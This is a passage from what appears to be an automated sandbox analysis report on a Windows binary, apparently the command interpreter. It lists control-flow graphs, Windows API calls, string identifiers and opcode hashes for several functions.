7ff64b56c856-7ff64b56c85c call 7ff64b567a70 743->765 744->734 751 7ff64b56c817-7ff64b56c81b 745->751 752 7ff64b56c9e2-7ff64b56c9e7 745->752 746->745 755 7ff64b56c83d 749->755 756 7ff64b56c78a-7ff64b56c7a4 wcschr 749->756 758 7ff64b56ca1b-7ff64b56ca1f 751->758 759 7ff64b56c821 751->759 752->751 760 7ff64b56c9ed-7ff64b56c9f7 call 7ff64b57291c 752->760 755->743 762 7ff64b56c7aa-7ff64b56c7ad 756->762 763 7ff64b56c8de-7ff64b56c8f7 756->763 758->759 766 7ff64b56ca25-7ff64b57c6b3 call 7ff64b563278 758->766 767 7ff64b56c824-7ff64b56c82d 759->767 774 7ff64b56c9fd-7ff64b56ca00 760->774 775 7ff64b57c684-7ff64b57c698 call 7ff64b563278 760->775 770 7ff64b56c7b0-7ff64b56c7b8 762->770 771 7ff64b56c900-7ff64b56c908 763->771 764->765 779 7ff64b56c862-7ff64b56c86c 765->779 766->692 767->767 768 7ff64b56c82f-7ff64b56c837 767->768 768->749 768->755 770->770 776 7ff64b56c7ba-7ff64b56c7c7 770->776 771->771 777 7ff64b56c90a-7ff64b56c915 771->777 774->751 781 7ff64b56ca06-7ff64b56ca10 call 7ff64b5689c0 774->781 775->692 776->738 782 7ff64b56c7cd-7ff64b56c7db 776->782 783 7ff64b56c93a-7ff64b56c944 777->783 784 7ff64b56c917 777->784 779->727 779->732 781->751 799 7ff64b56ca16-7ff64b57c67f GetLastError call 7ff64b563278 781->799 788 7ff64b56c7e0-7ff64b56c7e7 782->788 791 7ff64b56ca2a-7ff64b56ca2f call 7ff64b579158 783->791 792 7ff64b56c94a 783->792 789 7ff64b56c920-7ff64b56c928 784->789 794 7ff64b56c7e9-7ff64b56c7f1 788->794 795 7ff64b56c800-7ff64b56c803 788->795 796 7ff64b56c92a-7ff64b56c92f 789->796 797 7ff64b56c932-7ff64b56c938 789->797 791->702 792->695 794->795 800 7ff64b56c7f3-7ff64b56c7fe 794->800 795->728 801 7ff64b56c809 795->801 796->797 797->783 797->789 799->692 800->788 800->795 801->745
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleTitlewcschr
                                                                              • String ID: /$:
                                                                              • API String ID: 2364928044-4222935259
                                                                              • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                              • Instruction ID: 6f25b35970ab9f552a83017e9f4746e2316982a78b5d77e36edba95d7b75a93a
                                                                              • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                              • Instruction Fuzzy Hash: C4C18D61A0C64291EB6CBF19D4442B9E6B1EF89B90F44A135D93E862F7DF7CE845C700
                                                                              Function 00007FF64B567AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 807 7ff64b567aa0-7ff64b567ad9 808 7ff64b567aeb-7ff64b567b38 memset call 7ff64b56ca40 807->808 809 7ff64b567adb-7ff64b567ae5 call 7ff64b57291c 807->809 814 7ff64b567b3e-7ff64b567b6d GetFullPathNameW 808->814 815 7ff64b57ae4e-7ff64b57ae53 808->815 809->808 816 7ff64b57ae3a-7ff64b57ae49 call 7ff64b563278 809->816 818 7ff64b57ae55-7ff64b57ae5c GetLastError 814->818 819 7ff64b567b73-7ff64b567b78 814->819 817 7ff64b57ae61-7ff64b57ae63 815->817 825 7ff64b567bb7-7ff64b567bdd call 7ff64b578f80 816->825 821 7ff64b57af64-7ff64b57af6b call 7ff64b563278 817->821 818->817 822 7ff64b57ae68-7ff64b57ae6d 819->822 823 7ff64b567b7e-7ff64b567b91 CreateDirectoryW 819->823 826 7ff64b57ae74-7ff64b57ae7e call 7ff64b563278 822->826 827 7ff64b567b93-7ff64b567ba7 823->827 828 7ff64b567bdf-7ff64b567bf2 GetLastError 823->828 842 7ff64b57ae84-7ff64b57ae8e 826->842 831 7ff64b567ba9-7ff64b567bb0 free 827->831 832 7ff64b567bb5 827->832 834 7ff64b567bf8-7ff64b567bfb 828->834 835 7ff64b57ae6f 828->835 831->832 832->825 834->817 839 7ff64b567c01-7ff64b567c08 834->839 835->826 840 7ff64b567c0e-7ff64b567c2e 839->840 841 7ff64b57af5f 839->841 840->842 843 7ff64b567c34-7ff64b567c4a 840->843 841->821 842->841 846 7ff64b57ae94-7ff64b57aea4 842->846 844 7ff64b567cd1-7ff64b567ced CreateDirectoryW 843->844 845 7ff64b567c50 843->845 844->827 849 7ff64b567cf3 844->849 847 7ff64b567cbe-7ff64b567cc1 845->847 846->841 848 7ff64b57aeaa-7ff64b57aeca 846->848 850 7ff64b567cad-7ff64b567cb0 847->850 851 7ff64b567cc3-7ff64b567cc6 847->851 852 7ff64b57aecc 848->852 853 7ff64b57aef1-7ff64b57aef5 848->853 854 7ff64b57af46-7ff64b57af54 GetLastError 849->854 857 7ff64b567c52-7ff64b567c79 CreateDirectoryW 850->857 858 7ff64b567cb2-7ff64b567cbb 850->858 860 7ff64b567cc8 851->860 861 7ff64b567ca5-7ff64b567cab 851->861 862 7ff64b57aecf-7ff64b57aed6 852->862 855 7ff64b57aef7-7ff64b57af00 853->855 856 7ff64b57af03-7ff64b57af0b 853->856 854->827 859 7ff64b57af5a 854->859 855->856 856->844 863 7ff64b57af11-7ff64b57af18 856->863 864 7ff64b567c7b-7ff64b567c89 GetLastError 857->864 865 7ff64b567c8f-7ff64b567ca0 857->865 858->847 859->817 860->857 861->850 866 7ff64b567cca 861->866 862->853 867 7ff64b57aed8-7ff64b57aeef 862->867 868 7ff64b57af1a-7ff64b57af31 863->868 869 7ff64b57af33-7ff64b57af37 863->869 864->841 864->865 865->861 866->844 867->853 867->862 868->863 868->869 869->844 870 7ff64b57af3d 869->870 870->854
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryDriveFullNamePathTypefreememset
                                                                              • String ID:
                                                                              • API String ID: 1445986735-0
                                                                              • Opcode ID: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                                                                              • Instruction ID: dfe796a7224a55dadb936a50033af0205a38a17636acaeb1b9555550b087068a
                                                                              • Opcode Fuzzy Hash: 964aebb90721e81bfd08c07265eff513d24d8c56c735c939700b0a9033b58433
                                                                              • Instruction Fuzzy Hash: F7918166B0CA82C6EB69BF11D4402B9B3A1FB8CB84F44D135DA5E877A6EF7CD5418700
                                                                              Function 00007FF64B578D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                              • String ID:
                                                                              • API String ID: 4291973834-0
                                                                              • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                              • Instruction ID: 7c0576e15de42dd32e6ae849aff47f843cbcdf3579b6690a3ffaa088ad9253a8
                                                                              • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                              • Instruction Fuzzy Hash: 8041D3B1A1C602C6FB98BF16E940679A2A1AF5C394F048435DA2DC76F3DFBCE8449740
                                                                              Function 00007FF64B574A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A28
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A66
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A7D
                                                                              • memmove.MSVCRT(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574A9A
                                                                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF64B5749F1), ref: 00007FF64B574AA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                              • String ID:
                                                                              • API String ID: 1623332820-0
                                                                              • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                              • Instruction ID: ee888ef23611edfdaba9e9c98d382d7e10deaefa0589f02c0e1ff1ea224c4144
                                                                              • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                              • Instruction Fuzzy Hash: B1118F22B19742C2DA14BF0AE41403DFBA1EB8DF80F599034DE5E43765DE7DE8418740
                                                                              Function 00007FF64B56CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                              • API String ID: 2221118986-3416068913
                                                                              • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                              • Instruction ID: cc909b70a3735d51900029f97ee55888ad114a0d50ef9ae4931ace2c2d2265aa
                                                                              • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                              • Instruction Fuzzy Hash: 78117061B0D64281EB58FF55E1542B9A2A09F8CBA4F189231DA7DCA7F7DE6CD4818340
                                                                              Function 00007FF64B56BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 958 7ff64b56be00-7ff64b56be15 959 7ff64b56befb-7ff64b56befd 958->959 960 7ff64b56be1b-7ff64b56be22 958->960 961 7ff64b56bed2-7ff64b56bee2 959->961 960->959 962 7ff64b56be28-7ff64b56be2b 960->962 962->959 963 7ff64b56be31-7ff64b56be45 962->963 964 7ff64b56be6b-7ff64b56be6d 963->964 965 7ff64b56be47-7ff64b56be69 memset call 7ff64b56bff0 963->965 967 7ff64b56be73-7ff64b56be79 964->967 968 7ff64b56bf20-7ff64b56bf23 964->968 965->964 973 7ff64b56beaf-7ff64b56beb6 965->973 970 7ff64b56be7b-7ff64b56be89 967->970 971 7ff64b56be92-7ff64b56be9a 967->971 968->967 972 7ff64b56bf29-7ff64b56bf39 call 7ff64b56cd90 968->972 970->971 974 7ff64b56be8b-7ff64b56be90 970->974 975 7ff64b56be9c call 7ff64b56c620 971->975 976 7ff64b56bee4-7ff64b56bef9 971->976 972->973 983 7ff64b56bf3f-7ff64b56bf42 972->983 980 7ff64b56bec8-7ff64b56beca 973->980 981 7ff64b56beb8-7ff64b56bec3 call 7ff64b56bff0 973->981 974->971 978 7ff64b56bf0c-7ff64b56bf18 call 7ff64b56b0d8 974->978 986 7ff64b56bea1-7ff64b56bead 975->986 976->986 978->971 994 7ff64b56bf1e 978->994 980->961 981->980 988 7ff64b56bf44-7ff64b56bf5d call 7ff64b5688a8 983->988 989 7ff64b56bf9e-7ff64b56bfab call 7ff64b5671ec 983->989 986->973 991 7ff64b56beff-7ff64b56bf03 986->991 988->989 1000 7ff64b56bf5f-7ff64b56bf73 call 7ff64b570a6c 988->1000 989->973 999 7ff64b56bfb1-7ff64b56bfc1 call 7ff64b56cd90 989->999 991->973 993 7ff64b56bf05-7ff64b56bf0a call 7ff64b56af98 991->993 993->973 994->973 999->973 1006 7ff64b56bfc7-7ff64b56bfe1 call 7ff64b57081c 999->1006 1000->989 1007 7ff64b56bf75-7ff64b56bf81 call 7ff64b56b0d8 1000->1007 1006->1007 1007->973 1012 7ff64b56bf87-7ff64b56bf99 call 7ff64b575ad8 1007->1012 1012->986
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcschr
                                                                              • String ID: 2$COMSPEC
                                                                              • API String ID: 1764819092-1738800741
                                                                              • Opcode ID: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                                                                              • Instruction ID: 403f56c7104691c01b4ae6be0d48f1bf0b9efe0d77176b30079a893788e38f05
                                                                              • Opcode Fuzzy Hash: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                                                                              • Instruction Fuzzy Hash: 65513A61A0C68285FB6CBF25E452379E395AF4DB84F086031DA2DC66F7EE6CE8448741
                                                                              Function 00007FF64B579A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Concurrency::cancel_current_taskmalloc
                                                                              • String ID:
                                                                              • API String ID: 1412018758-0
                                                                              • Opcode ID: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                                                                              • Instruction ID: bfefa1f4b0c8a8d093acebd9bc8dce44ffca76e82f92462025d27929dc6b166a
                                                                              • Opcode Fuzzy Hash: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                                                                              • Instruction Fuzzy Hash: 3AE06D40F0E707A2FE1C3F62E84507892405F2CB40E185430DD3E853A3EE6CA0918360
                                                                              Function 00007FF64B574C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: exit
                                                                              • String ID:
                                                                              • API String ID: 2483651598-0
                                                                              • Opcode ID: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                                                                              • Instruction ID: 7e57ec802e6422eb2df5b032cd6f478fa9015b78e494c84a58ad7bf9c1cd59c1
                                                                              • Opcode Fuzzy Hash: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                                                                              • Instruction Fuzzy Hash: 29C0803070C646C7FB1C7F31A45903DD5595F0C301F04943CC627C52A3DE6CD4048200
                                                                              Function 00007FF64B575508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF64B566F97), ref: 00007FF64B57550C
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultLangUser
                                                                              • String ID:
                                                                              • API String ID: 768647712-0
                                                                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                              • Instruction ID: adb0f2e92a9a3c1d42dead8ee2d59345bb493b585524c96445e2362b2405c266
                                                                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                              • Instruction Fuzzy Hash: CBE0C2A2E0D2538AF59C3F41F0413B89953CB6C782FC48031CB2D812E24D2D28425208
                                                                              Function 00007FF64B572E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID:
                                                                              • API String ID: 2221118986-0
                                                                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                              • Instruction ID: c361bb5ba58876f4285f69f1549c26679fbd15f56e51f4a694088374a3f79175
                                                                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                              • Instruction Fuzzy Hash: CBF0B421B0D78140EE58BB56F54012992919B8CBE0F08C330EE7C87BE6DE7CD4528700

                                                                              Non-executed Functions

                                                                              Function 00007FF64B587F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B587F44
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B587F5C
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B587F9E
                                                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B587FFF
                                                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588020
                                                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588036
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588061
                                                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588075
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5880D6
                                                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5880EA
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B588177
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B58819A
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B5881BD
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B5881DC
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B5881FB
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B58821A
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B588239
                                                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588291
                                                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5882D7
                                                                              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5882FB
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B58831A
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588364
                                                                              • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588378
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B58839A
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5883AE
                                                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B5883E6
                                                                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588403
                                                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF64B588418
                                                                              Strings
                                                                              Memory Dump Source
